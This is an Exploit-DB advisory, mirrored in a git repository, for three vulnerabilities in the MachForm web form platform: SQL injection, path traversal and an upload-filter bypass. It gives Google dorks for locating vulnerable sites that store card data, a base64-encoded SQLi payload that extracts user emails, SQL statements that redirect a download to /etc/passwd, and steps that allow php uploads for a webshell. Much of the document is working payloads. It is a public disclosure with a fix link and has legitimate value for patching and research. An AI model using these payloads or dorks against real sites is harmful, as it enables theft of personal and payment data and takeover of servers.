bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/44804.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

105 lines
No EOL
3.7 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Vendor: Appnitro
Product webpage: https://www.machform.com/
Full-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/
Fix: https://www.machform.com/blog-machform-423-security-release/
Author: Amine Taouirsa
Twitter: @metalamin
Google dork examples:
----------------------
"machform" inurl:"view.php"
"machform" inurl:"embed.php"
Summary:
---------
The form creation platform MachForm from Appnitro is subject to SQL
injections that lead to path traversal and arbitrary file upload.
The application is widely deployed and with some google dorks its possible
to find various webpages storing sensitive data as credit card numbers with
corresponding security codes. Also, the arbitrary file upload can let an
attacker get control of the server by uploading a WebShell.
[1] SQL injection (CVE-2018-6410):
-------------------------
[1.1] Description:
The software is subject to SQL injections in the download.php file.
[1.2] Parameters and statement:
This SQLi can be found on the parameter q which a base64 encoded value
for the following parameters:
$form_id = $params['form_id'];
$id = $params['id'];
$field_name = $params['el'];
$file_hash = $params['hash'];
So the injectable parameters are el and form_id obtaining error-based,
stacked queries and time-based blind SQL injections. This is due to the
following vulnerable statement:
$query = "select {$field_name} from `".MF_TABLE_PREFIX."form_{$form_id}`
where id=?";
[1.3] POC
Proof of concept to get the first user mail:
http:// [URL] / [Machform_folder] /download.php?q=
ZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgy
MDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3Vz
ZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1Io
UkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RF
Ul9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=
Which is the base64 encoding for:
el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT
MID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT
0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP
BY x)a) ;&id=1&hash=1&form_id=1
[2] Path traversal (CVE-2018-6409):
-----------------------------------
[2.1] Descrition
download.php is used to serve stored files from the forms answers.
Modifying the name of the file to serve on the corresponding ap_form table
leads to a path traversal vulnerability.
[2.2] POC
First we need to change the name for the element on the form:
update ap_form_58009 set element_4="../../../../../../.
./../../../../../../../../../etc/passwd" where id=1;
Now in order to be able to download it, we need to access:
http:// [URL] / [Machform_folder] /download.php?q=
ZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0
NTgmZm9ybV9pZD01ODAwOQo=
Which is the base64 encoding for;
el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009
Note that hash is the MD5 of the corresponding filename:
md5("../../../../../../../../../../../../../../../../etc/passwd") =
402ba0230d6f44a2de590ac11107a458
[3] Bypass file upload filter (CVE-2018-6411):
----------------------------------------------
When the form is set to filter a blacklist, it automatically add dangerous
extensions to the filters.
If the filter is set to a whitelist, the dangerous extensions can be
bypassed.
This can be done directly on the database via SQLi
update ap_form_elements set element_file_type_list="php",
element_file_block_or_allow="a" where form_id=58009 and element_id=4;
Once uploaded the file can be found and executed in the following URL:
http:// [URL] / [Machform_folder] /data/form_58009/files/ [filename]
The filename can be found in the database
SELECT element_4 FROM ap_form_58009 WHERE id=1;
Reference in a new issue View git blame Copy permalink